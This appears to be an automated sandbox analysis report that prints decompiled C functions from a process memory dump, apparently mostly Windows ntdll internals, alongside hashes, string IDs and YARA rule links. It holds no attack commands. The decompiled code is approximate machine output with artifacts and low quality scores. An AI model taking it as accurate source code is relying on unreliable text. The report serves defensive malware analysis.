                                                                          0x011f35a1
                                                                          0x011f35a5
                                                                          0x011f366b
                                                                          0x011f366b
                                                                          0x011f366d
                                                                          0x011f3672
                                                                          0x011f3679
                                                                          0x011f3685
                                                                          0x011f368d
                                                                          0x011f369d
                                                                          0x011f36a7
                                                                          0x011f36b8
                                                                          0x011f36c6
                                                                          0x011f36c7
                                                                          0x011f36dc
                                                                          0x011f36e1
                                                                          0x011f36e7
                                                                          0x011f36e9
                                                                          0x011f36e9
                                                                          0x011f3703
                                                                          0x011f3703
                                                                          0x011f35b5
                                                                          0x011f35c0
                                                                          0x011f35c4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011f35ca
                                                                          0x011f35d7
                                                                          0x011f35e2
                                                                          0x011f35e6
                                                                          0x011f35e8
                                                                          0x011f35f5
                                                                          0x011f35fa
                                                                          0x011f3603
                                                                          0x011f3604
                                                                          0x011f3609
                                                                          0x011f360a
                                                                          0x011f3612
                                                                          0x011f3613
                                                                          0x011f361e
                                                                          0x011f3622
                                                                          0x011f3628
                                                                          0x011f362f
                                                                          0x011f362f
                                                                          0x011f3636
                                                                          0x011f3638
                                                                          0x011f363b
                                                                          0x011f3642
                                                                          0x011f3642
                                                                          0x011f3636
                                                                          0x011f3657
                                                                          0x011f3657
                                                                          0x011f365c
                                                                          0x011f3662
                                                                          0x011f3669
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryHash
                                                                          • API String ID: 0-2202222882
                                                                          • Opcode ID: deb1450cbcd4c7e26459ce80b0709ff3cf1d8ae5beef4fec4bbb68c437997608
                                                                          • Instruction ID: 8a2620d2978ba4b46e27959ed349316fdc182e52eb840b04e8bd1e0ecdcdb74b
                                                                          • Opcode Fuzzy Hash: deb1450cbcd4c7e26459ce80b0709ff3cf1d8ae5beef4fec4bbb68c437997608
                                                                          • Instruction Fuzzy Hash: E54134F1D1052DAADB25DA50CC84FEEB77CAB54718F0045A9EB19AB240DB309F89CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011F3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E011F3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E011B9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01194620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E011B9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                          0x011f3893
                                                                          0x011f3896
                                                                          0x011f3899
                                                                          0x011f389f
                                                                          0x011f38a0
                                                                          0x011f38a4
                                                                          0x011f38a9
                                                                          0x011f38ac
                                                                          0x011f38ad
                                                                          0x011f38ae
                                                                          0x011f38af
                                                                          0x011f38b1
                                                                          0x011f38b4
                                                                          0x011f38bb
                                                                          0x011f38bc
                                                                          0x011f38bd
                                                                          0x011f38c4
                                                                          0x011f38c8
                                                                          0x011f38ca
                                                                          0x011f38ca
                                                                          0x011f38d5
                                                                          0x011f393e
                                                                          0x011f3940
                                                                          0x011f3942
                                                                          0x011f3952
                                                                          0x011f3954
                                                                          0x011f3961
                                                                          0x011f3961
                                                                          0x011f3967
                                                                          0x011f396e
                                                                          0x011f396e
                                                                          0x011f3947
                                                                          0x011f394c
                                                                          0x00000000
                                                                          0x011f394c
                                                                          0x011f38ea
                                                                          0x011f38ee
                                                                          0x011f38f8
                                                                          0x011f38f9
                                                                          0x011f38ff
                                                                          0x011f3900
                                                                          0x011f3902
                                                                          0x011f3903
                                                                          0x011f390b
                                                                          0x011f390f
                                                                          0x011f3950
                                                                          0x00000000
                                                                          0x011f3950
                                                                          0x011f3915
                                                                          0x011f391d
                                                                          0x011f391d
                                                                          0x011f3922
                                                                          0x011f3926
                                                                          0x00000000
                                                                          0x011f3928
                                                                          0x011f392b
                                                                          0x011f392b
                                                                          0x011f3935
                                                                          0x011f3937
                                                                          0x011f3937
                                                                          0x00000000
                                                                          0x011f3935
                                                                          0x011f3926
                                                                          0x011f38f0
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryName
                                                                          • API String ID: 0-215506332
                                                                          • Opcode ID: 01e67ef2d10df4834cd442696b695a4b3cb01365bd30558d767fbfa80dbc084e
                                                                          • Instruction ID: 83a504b26224a5817baf2d55f2479bf7ba433c7aafcf66c59bdb57aa65d9a9ec
                                                                          • Opcode Fuzzy Hash: 01e67ef2d10df4834cd442696b695a4b3cb01365bd30558d767fbfa80dbc084e
                                                                          • Instruction Fuzzy Hash: 7231E572D1051AAFDB1DDA58C945EAFBBB4FB80724F01416DEA24A7290E7309E00CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011AD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 33%
                                                                          			E011AD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x126d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01194120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E011BB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E011B98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E011B95D0();
					L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                          0x011ad29c
                                                                          0x011ad2a6
                                                                          0x011ad2b1
                                                                          0x011ad2b5
                                                                          0x011ad2b6
                                                                          0x011ad2bc
                                                                          0x011ad2bd
                                                                          0x011ad2be
                                                                          0x011ad2bf
                                                                          0x011ad2c2
                                                                          0x011ad2c4
                                                                          0x011ad2cc
                                                                          0x011ad384
                                                                          0x011ad34b
                                                                          0x011ad34f
                                                                          0x011ad350
                                                                          0x011ad351
                                                                          0x011ad35c
                                                                          0x011ad35c
                                                                          0x011ad2d6
                                                                          0x011ad2da
                                                                          0x011ad2e1
                                                                          0x011ad361
                                                                          0x011ad369
                                                                          0x011ad36d
                                                                          0x011ad2e3
                                                                          0x011ad2e3
                                                                          0x011ad2e3
                                                                          0x011ad2e5
                                                                          0x011ad2ed
                                                                          0x011ad2f5
                                                                          0x011ad2fa
                                                                          0x011ad302
                                                                          0x011ad303
                                                                          0x011ad30b
                                                                          0x011ad30f
                                                                          0x011ad313
                                                                          0x011ad318
                                                                          0x011ad31c
                                                                          0x011ad320
                                                                          0x011ad379
                                                                          0x011ad37d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011eaffe
                                                                          0x011eb001
                                                                          0x011eb011
                                                                          0x00000000
                                                                          0x011ad322
                                                                          0x011ad322
                                                                          0x011ad330
                                                                          0x011ad337
                                                                          0x011ad35d
                                                                          0x011ad339
                                                                          0x011ad33f
                                                                          0x011ad38c
                                                                          0x011ad38c
                                                                          0x011ad33f
                                                                          0x011ad349
                                                                          0x00000000
                                                                          0x011ad349

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: 09eac2d53cb24375da7a9175d91ee9dc6190c6a0006b1f4d67dc0e78c36fa8bf
                                                                          • Instruction ID: 997a6b832053a99eae87efe1d68f2061f3b6d1f70a377b96aca7f946224fbadc
                                                                          • Opcode Fuzzy Hash: 09eac2d53cb24375da7a9175d91ee9dc6190c6a0006b1f4d67dc0e78c36fa8bf
                                                                          • Instruction Fuzzy Hash: 8931BAB950CB059FCB19DF6898809ABBFE8EF85658F40092EF99483650D734DD04CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01181B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E01181B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E011BBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E011BA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E011BA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01194620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                          0x01181b8f
                                                                          0x01181b9a
                                                                          0x01181b9c
                                                                          0x01181b9e
                                                                          0x01181ba3
                                                                          0x011d7010
                                                                          0x011d7010
                                                                          0x00000000
                                                                          0x01181ba9
                                                                          0x01181ba9
                                                                          0x01181bae
                                                                          0x00000000
                                                                          0x01181bc5
                                                                          0x01181bca
                                                                          0x01181bcf
                                                                          0x01181bd0
                                                                          0x01181bd1
                                                                          0x01181bd2
                                                                          0x01181bd6
                                                                          0x01181bdc
                                                                          0x01181be0
                                                                          0x011d6ffc
                                                                          0x011d7000
                                                                          0x00000000
                                                                          0x011d7006
                                                                          0x011d7009
                                                                          0x011d7009
                                                                          0x01181be6
                                                                          0x01181bec
                                                                          0x01181c0b
                                                                          0x01181c0b
                                                                          0x01181c0c
                                                                          0x01181c11
                                                                          0x01181c12
                                                                          0x01181c15
                                                                          0x01181c1b
                                                                          0x01181c1f
                                                                          0x01181c31
                                                                          0x01181c33
                                                                          0x011d7026
                                                                          0x011d7026
                                                                          0x01181c21
                                                                          0x01181c24
                                                                          0x01181c24
                                                                          0x01181bee
                                                                          0x01181bee
                                                                          0x01181bf2
                                                                          0x01181c3a
                                                                          0x01181bf4
                                                                          0x01181bf4
                                                                          0x01181c05
                                                                          0x01181c05
                                                                          0x01181c09
                                                                          0x01181c3e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01181c09
                                                                          0x01181bec
                                                                          0x01181be0
                                                                          0x01181bae
                                                                          0x01181c2e

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: WindowsExcludedProcs
                                                                          • API String ID: 0-3583428290
                                                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                          • Instruction ID: c839e80b80d62811d5f58970f8436448c7d172870c95a13741de2ad955e06b25
                                                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                          • Instruction Fuzzy Hash: 82210A77500119BFDB2EAA59D880F9B7B6DEF41655F068425FE04DB240D730DD02DBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0119F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0119F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                          0x0119f71d
                                                                          0x0119f722
                                                                          0x0119f726
                                                                          0x011e4770
                                                                          0x0119f765
                                                                          0x0119f769
                                                                          0x0119f769
                                                                          0x0119f732
                                                                          0x011e477a
                                                                          0x00000000
                                                                          0x011e477a
                                                                          0x0119f738
                                                                          0x0119f73a
                                                                          0x0119f73c
                                                                          0x0119f73f
                                                                          0x0119f746
                                                                          0x0119f778
                                                                          0x0119f7a9
                                                                          0x0119f7a9
                                                                          0x0119f754
                                                                          0x0119f75a
                                                                          0x0119f75d
                                                                          0x0119f75f
                                                                          0x0119f761
                                                                          0x0119f76f
                                                                          0x0119f771
                                                                          0x0119f771
                                                                          0x0119f76f
                                                                          0x0119f763
                                                                          0x00000000
                                                                          0x0119f763
                                                                          0x0119f77d
                                                                          0x0119f7a3
                                                                          0x0119f7a5
                                                                          0x00000000
                                                                          0x0119f7a5
                                                                          0x0119f77f
                                                                          0x0119f782
                                                                          0x0119f784
                                                                          0x0119f786
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0119f788
                                                                          0x0119f748
                                                                          0x0119f74d
                                                                          0x0119f78d
                                                                          0x0119f793
                                                                          0x0119f7b7
                                                                          0x0119f7bc
                                                                          0x00000000
                                                                          0x0119f7bc
                                                                          0x0119f798
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0119f79d
                                                                          0x0119f7b0
                                                                          0x00000000
                                                                          0x0119f7b0
                                                                          0x0119f79f
                                                                          0x00000000
                                                                          0x0119f74f
                                                                          0x0119f74f
                                                                          0x00000000
                                                                          0x0119f74f

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Actx
                                                                          • API String ID: 0-89312691
                                                                          • Opcode ID: 9ff76c99274c35233dcf806efee4e93077d43ccb6d13c64461781547d2e8b257
                                                                          • Instruction ID: c540a1865f7a698756a658ac3e63d0aadb7505755e3b2a661c6c8a458df331cc
                                                                          • Opcode Fuzzy Hash: 9ff76c99274c35233dcf806efee4e93077d43ccb6d13c64461781547d2e8b257
                                                                          • Instruction Fuzzy Hash: 8611B235708F43ABEF2D4E1D859473E7ED6AB85624F26452AE571CB391DB70C8438342
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01228DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 71%
                                                                          			E01228DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1250d50);
				E011CD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01205720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L011CDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L011CDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E011CD130(_t34, _t39, _t40);
			}





                                                                          0x01228df1
                                                                          0x01228df1
                                                                          0x01228df1
                                                                          0x01228df1
                                                                          0x01228df1
                                                                          0x01228df1
                                                                          0x01228df3
                                                                          0x01228df8
                                                                          0x01228dfd
                                                                          0x01228e00
                                                                          0x01228e0e
                                                                          0x01228e2a
                                                                          0x01228e36
                                                                          0x01228e38
                                                                          0x01228e3c
                                                                          0x01228e46
                                                                          0x01228e46
                                                                          0x01228e36
                                                                          0x01228e50
                                                                          0x01228e56
                                                                          0x01228e59
                                                                          0x01228e5c
                                                                          0x01228e60
                                                                          0x01228e67
                                                                          0x01228e6d
                                                                          0x01228e73
                                                                          0x01228e74
                                                                          0x01228eb1
                                                                          0x01228ebd

                                                                          Strings
                                                                          • Critical error detected %lx, xrefs: 01228E21
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Critical error detected %lx
                                                                          • API String ID: 0-802127002
                                                                          • Opcode ID: 3f93c1dc75a01c68d312ea1c53ae31bc895d32d2a822d3aaca3c99eb7df8de75
                                                                          • Instruction ID: 1d0c6288ba7f669ceefbd651ed8d332658bd26cb3772542a65153ec45e43e9a9
                                                                          • Opcode Fuzzy Hash: 3f93c1dc75a01c68d312ea1c53ae31bc895d32d2a822d3aaca3c99eb7df8de75
                                                                          • Instruction Fuzzy Hash: 31116D71D25349EBDF29CFA895057DCBBF0BB14714F20426DE5696B292C3744601CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0120FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0120FF60
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                          • API String ID: 0-1911121157
                                                                          • Opcode ID: e86695134f03ff34231f30f826aed18055ff1fe8443ab17da79d536fae5274be
                                                                          • Instruction ID: 34ce26df4a55ea8922f7d1059bb067d6ff5a2f70c45b805031e7a524f50e50fe
                                                                          • Opcode Fuzzy Hash: e86695134f03ff34231f30f826aed18055ff1fe8443ab17da79d536fae5274be
                                                                          • Instruction Fuzzy Hash: A2110471560645EFDF26DF54C94CF98BBB1FF14B08F148158E204571E2C7399950CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01245BA5, Relevance: .6, Instructions: 592COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 88%
                                                                          			E01245BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1251178);
				E011CD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01244C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E011BD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01245542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x12660e8;
								if( *0x12660e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x12660e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E011B9710();
												_t475 = _t427;
